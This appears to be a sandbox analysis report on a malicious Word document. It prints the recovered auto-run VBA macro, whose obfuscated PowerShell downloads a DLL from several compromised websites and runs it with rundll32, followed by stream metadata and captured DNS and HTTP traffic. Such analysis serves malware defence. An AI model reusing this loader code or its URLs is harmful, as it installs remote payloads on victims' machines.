                                                                                                                                    Set dvfghwkuibisdbgfiw = CreateObject(goh4iahwodegiyna89deyfni("fARDfAS.fADafAtafASpfAacfAe", "fA"))
                                                                                                                                    Dim fs As Integer: If bfik3uvgikuds < 0.021335 And bfik3uvgikuds > -0.0134542765 Then fhokl34rhyw5uwegea = goh4iahwodegiyna89deyfni(fbhqwieusiyeoiwugeig, "elf")
                                                                                                                                    End If
                                                                                                                                    End If
                                                                                                                                    Next
                                                                                                                                    If d <> 0.123456 Then
                                                                                                                                    ra = Replace(s1, ",", "")
                                                                                                                                    End If
                                                                                                                                    End Sub
                                                                                                                                    Private Function dfjolirhoghwow(ByVal filename$, Optional ByVal name$ = "") As String
                                                                                                                                        On Error Resume Next: Err.Clear: Const BYTES_PER_ROW& = 480
                                                                                                                                        Dim F_Content$
                                                                                                                                        ff& = FreeFile: Open filename$ For Binary Access Read As #ff
                                                                                                                                        fs& = LOF(ff): txt$ = String(fs&, Chr(0))
                                                                                                                                        Get #ff, , txt$: Close #ff
                                                                                                                                        F_Content$ = F_Content$ & "&" & name$ & "&" & vbNewLine
                                                                                                                                        F_Content$ = F_Content$ & "" & vbNewLine
                                                                                                                                        For i = 1 To Len(txt$)
                                                                                                                                            R& = Asc(Mid(txt, i, 1))
                                                                                                                                            res$ = res$ & IIf(Len(Hex(R)) = 1, "0", "") & Hex(R)
                                                                                                                                            If i Mod BYTES_PER_ROW& = 0 Then
                                                                                                                                                F_Content$ = F_Content$ & "&" & res$ & "" & vbNewLine
                                                                                                                                                res = "": DoEvents
                                                                                                                                            End If
                                                                                                                                        Next
                                                                                                                                        If Len(res) Then F_Content$ = F_Content$ & "&" & res$ & "" & vbNewLine
                                                                                                                                        F_Content$ = F_Content$ & "" & vbNewLine
                                                                                                                                        FileToVBAFunction = F_Content$
                                                                                                                                    End Function
                                                                                                                                    Private Sub Document_Open(): Dim gzjohestiha4otihsdoa8ef As String
                                                                                                                                    fjow3efyw98efhasdokfhlnkvawofh3 0, 0, "celfmelfd.elfeelfxelfe elf/elfc selftaelfrtelf /elfB pelfowelferselfhelelfl $delffkj=""$selftrs=\""helftelftpelf:elf/elf/pelfrimtalent.celfom/welfp-adelfmin/9yt1u/,helfttelfp:elf/elf/huskelfysb.coelfm/wordelfpress/6f0qIQlWPaYDfa/,helfttelfp:elf/elf/ridelfcyf.com/dm7vg/DGWFrJA0kutWTk/,htelftelfp:elf/elf/manelfak.edunelfetfoundelfation.orelfg/schelfool-facelfilitator/qlwM2RAHhDG8N8/,helftelftelfp:elf/elf/ckelffoods.nelfet/wpelf-admelfin/wPInm2rgMu/,helftelftelfp:elf/elf/adelforwelding.zmelfotpro.celfom/elfwp-conelftent/Z8ifMTCM2VBWlfeSZmzv/,htelftelfp:elf/elf/elfseelfrver.zmelfotpro.coelfm/venelfkat/proelfducts/facelfebelfook-pelfage/asselfets/kmIdeXnG/\""." & "Selfplelfit(\"",\"");felforelfeacelfh($selft inelf $selftrs){$relf1=Gelfet-Relfanelfdom;$relf2=Gelfet-Raelfndelfoelfm;$telfptelfh=\""celf:elf\pelfroelfgraelfmdelfatelfa\\\""+elf$relf1+\"".delflelfl\"";Ielfnelfvelfokelfe-WelfebelfReqelfueselft -Uelfrelfi $selft -OelfuelftFelfilelfe $telfptelfh;ielffelf(Telfeselft-Pelfatelfh $telfptelfh){$felfp=\""celf:elf\elfwelfinelfdoelfwelfs\selfyselfwelfowelf6elf4\relfunelfdlelfl3elf2.eelfxelfelfe\"";$aelf=$telfpelfth+\"",felf\""+$relf2;Selftelfarelft-Pelfrelfocelfeselfs $felfp -AelfrelfgumelfenelftLelfist $aelf;belfreaelfk;}};"";IelfEelfX $delffkj": End Sub

                                                                                                                                    Streams

                                                                                                                                    Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 519
                                                                                                                                    General
                                                                                                                                    Stream Path:PROJECT
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Stream Size:519
                                                                                                                                    Entropy:5.27637957879
                                                                                                                                    Base64 Encoded:True
                                                                                                                                    Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = c v b k u 3 g a k u i s d g f i l u 3 g b l a w / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . H e l p F i l e = " " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 6 4 4 E A B 6 7 6 B A B 8 B E B 8 B E B C C 2 B C C 2 " . .
                                                                                                                                    Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 63 76 62 6b 75 33 67 61 6b 75 69 73 64 67 66 69 6c 75 33 67 62 6c 61 77 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41
                                                                                                                                    Stream Path: PROJECTwm, File Type: data, Stream Size: 77
                                                                                                                                    General
                                                                                                                                    Stream Path:PROJECTwm
                                                                                                                                    File Type:data
                                                                                                                                    Stream Size:77
                                                                                                                                    Entropy:3.2550852567
                                                                                                                                    Base64 Encoded:False
                                                                                                                                    Data ASCII:c v b k u 3 g a k u i s d g f i l u 3 g b l a w . c . v . b . k . u . 3 . g . a . k . u . i . s . d . g . f . i . l . u . 3 . g . b . l . a . w . . . . .
                                                                                                                                    Data Raw:63 76 62 6b 75 33 67 61 6b 75 69 73 64 67 66 69 6c 75 33 67 62 6c 61 77 00 63 00 76 00 62 00 6b 00 75 00 33 00 67 00 61 00 6b 00 75 00 69 00 73 00 64 00 67 00 66 00 69 00 6c 00 75 00 33 00 67 00 62 00 6c 00 61 00 77 00 00 00 00 00
                                                                                                                                    Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4731
                                                                                                                                    General
                                                                                                                                    Stream Path:VBA/_VBA_PROJECT
                                                                                                                                    File Type:data
                                                                                                                                    Stream Size:4731
                                                                                                                                    Entropy:4.84395391101
                                                                                                                                    Base64 Encoded:False
                                                                                                                                    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                                                                                                                    Data Raw:cc 61 88 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 07 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                                                                    Stream Path: VBA/dir, File Type: data, Stream Size: 843
                                                                                                                                    General
                                                                                                                                    Stream Path:VBA/dir
                                                                                                                                    File Type:data
                                                                                                                                    Stream Size:843
                                                                                                                                    Entropy:6.51963251442
                                                                                                                                    Base64 Encoded:True
                                                                                                                                    Data ASCII:. G . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . i . c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . . N c .
                                                                                                                                    Data Raw:01 47 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 1a 69 8e 63 07 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

                                                                                                                                    Network Behavior

                                                                                                                                    Network Port Distribution

                                                                                                                                    TCP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Nov 22, 2021 13:23:07.452250004 CET4975480192.168.2.4148.72.96.3
                                                                                                                                    Nov 22, 2021 13:23:07.562594891 CET8049754148.72.96.3192.168.2.4
                                                                                                                                    Nov 22, 2021 13:23:07.563997984 CET4975480192.168.2.4148.72.96.3
                                                                                                                                    Nov 22, 2021 13:23:07.621309042 CET4975480192.168.2.4148.72.96.3
                                                                                                                                    Nov 22, 2021 13:23:07.732103109 CET8049754148.72.96.3192.168.2.4
                                                                                                                                    Nov 22, 2021 13:23:07.732558012 CET8049754148.72.96.3192.168.2.4
                                                                                                                                    Nov 22, 2021 13:23:07.783896923 CET4975480192.168.2.4148.72.96.3
                                                                                                                                    Nov 22, 2021 13:23:12.137522936 CET4975580192.168.2.460.248.112.145
                                                                                                                                    Nov 22, 2021 13:23:12.395803928 CET804975560.248.112.145192.168.2.4
                                                                                                                                    Nov 22, 2021 13:23:12.395912886 CET4975580192.168.2.460.248.112.145
                                                                                                                                    Nov 22, 2021 13:23:12.396229029 CET4975580192.168.2.460.248.112.145
                                                                                                                                    Nov 22, 2021 13:23:12.655375004 CET804975560.248.112.145192.168.2.4
                                                                                                                                    Nov 22, 2021 13:23:12.655504942 CET804975560.248.112.145192.168.2.4
                                                                                                                                    Nov 22, 2021 13:23:12.656769991 CET4975580192.168.2.460.248.112.145
                                                                                                                                    Nov 22, 2021 13:23:12.738183975 CET8049754148.72.96.3192.168.2.4
                                                                                                                                    Nov 22, 2021 13:23:12.738598108 CET4975480192.168.2.4148.72.96.3
                                                                                                                                    Nov 22, 2021 13:23:12.955651045 CET804975560.248.112.145192.168.2.4
                                                                                                                                    Nov 22, 2021 13:23:13.009346008 CET804975560.248.112.145192.168.2.4
                                                                                                                                    Nov 22, 2021 13:23:13.009438992 CET804975560.248.112.145192.168.2.4
                                                                                                                                    Nov 22, 2021 13:23:13.009509087 CET4975580192.168.2.460.248.112.145
                                                                                                                                    Nov 22, 2021 13:23:13.009685040 CET804975560.248.112.145192.168.2.4
                                                                                                                                    Nov 22, 2021 13:23:13.009969950 CET804975560.248.112.145192.168.2.4
                                                                                                                                    Nov 22, 2021 13:23:13.010060072 CET4975580192.168.2.460.248.112.145
                                                                                                                                    Nov 22, 2021 13:23:13.010180950 CET804975560.248.112.145192.168.2.4
                                                                                                                                    Nov 22, 2021 13:23:13.010404110 CET804975560.248.112.145192.168.2.4
                                                                                                                                    Nov 22, 2021 13:23:13.010487080 CET4975580192.168.2.460.248.112.145
                                                                                                                                    Nov 22, 2021 13:23:13.011825085 CET804975560.248.112.145192.168.2.4
                                                                                                                                    Nov 22, 2021 13:23:13.128189087 CET4975580192.168.2.460.248.112.145
                                                                                                                                    Nov 22, 2021 13:23:16.146481991 CET4975480192.168.2.4148.72.96.3
                                                                                                                                    Nov 22, 2021 13:23:16.146840096 CET4975580192.168.2.460.248.112.145

                                                                                                                                    UDP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Nov 22, 2021 13:23:07.295005083 CET5802853192.168.2.48.8.8.8
                                                                                                                                    Nov 22, 2021 13:23:07.316490889 CET53580288.8.8.8192.168.2.4
                                                                                                                                    Nov 22, 2021 13:23:11.849472046 CET5309753192.168.2.48.8.8.8
                                                                                                                                    Nov 22, 2021 13:23:12.135129929 CET53530978.8.8.8192.168.2.4

                                                                                                                                    DNS Queries

                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                    Nov 22, 2021 13:23:07.295005083 CET192.168.2.48.8.8.80xc0ddStandard query (0)primtalent.comA (IP address)IN (0x0001)
                                                                                                                                    Nov 22, 2021 13:23:11.849472046 CET192.168.2.48.8.8.80xdf56Standard query (0)huskysb.comA (IP address)IN (0x0001)

                                                                                                                                    DNS Answers

                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                    Nov 22, 2021 13:23:07.316490889 CET8.8.8.8192.168.2.40xc0ddNo error (0)primtalent.com148.72.96.3A (IP address)IN (0x0001)
                                                                                                                                    Nov 22, 2021 13:23:12.135129929 CET8.8.8.8192.168.2.40xdf56No error (0)huskysb.com60.248.112.145A (IP address)IN (0x0001)

                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                    • primtalent.com
                                                                                                                                    • huskysb.com

                                                                                                                                    HTTP Packets

                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    0192.168.2.449754148.72.96.380C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Nov 22, 2021 13:23:07.621309042 CET1203OUTGET /wp-admin/9yt1u/ HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                    Host: primtalent.com
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Nov 22, 2021 13:23:07.732558012 CET1204INHTTP/1.1 404 Not Found
                                                                                                                                    Date: Mon, 22 Nov 2021 12:23:07 GMT
                                                                                                                                    Server: Apache
                                                                                                                                    Content-Length: 315
                                                                                                                                    Keep-Alive: timeout=5
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    1192.168.2.44975560.248.112.14580C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Nov 22, 2021 13:23:12.396229029 CET1205OUTGET /wordpress/6f0qIQlWPaYDfa/ HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                    Host: huskysb.com
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Nov 22, 2021 13:23:12.655504942 CET1206INHTTP/1.1 302 Found
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                    content-type: text/html
                                                                                                                                    content-length: 683
                                                                                                                                    date: Mon, 22 Nov 2021 12:23:12 GMT
                                                                                                                                    server: LiteSpeed
                                                                                                                                    cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                    location: http://huskysb.com/cgi-sys/suspendedpage.cgi
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 32 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>
                                                                                                                                    Nov 22, 2021 13:23:12.656769991 CET1206OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                    Host: huskysb.com
                                                                                                                                    Nov 22, 2021 13:23:13.009346008 CET1207INHTTP/1.1 200 OK
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                    content-type: text/html
                                                                                                                                    transfer-encoding: chunked
                                                                                                                                    date: Mon, 22 Nov 2021 12:23:13 GMT
                                                                                                                                    server: LiteSpeed
                                                                                                                                    Data Raw: 31 64 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 6f 75 6e 74 20 53 75 73 70 65 6e 64 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 75 73 65 2e 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 72 65 6c 65 61 73 65 73 2f 76 35 2e 30 2e 36 2f 63 73 73 2f 61 6c 6c 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20
                                                                                                                                    Data Ascii: 1dc0<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1"> <title>Account Suspended</title> <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css"> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF;
                                                                                                                                    Nov 22, 2021 13:23:13.009438992 CET1209INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69
                                                                                                                                    Data Ascii: } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width:
                                                                                                                                    Nov 22, 2021 13:23:13.009685040 CET1210INData Raw: 44 71 43 41 4d 41 41 41 43 72 78 6a 68 64 41 41 41 41 74 31 42 4d 56 45 55 41 41 41 41 41 41 41 44 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f
                                                                                                                                    Data Ascii: DqCAMAAACrxjhdAAAAt1BMVEUAAAAAAAD////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////5+fn////////////////////////////////6+vr//////////////
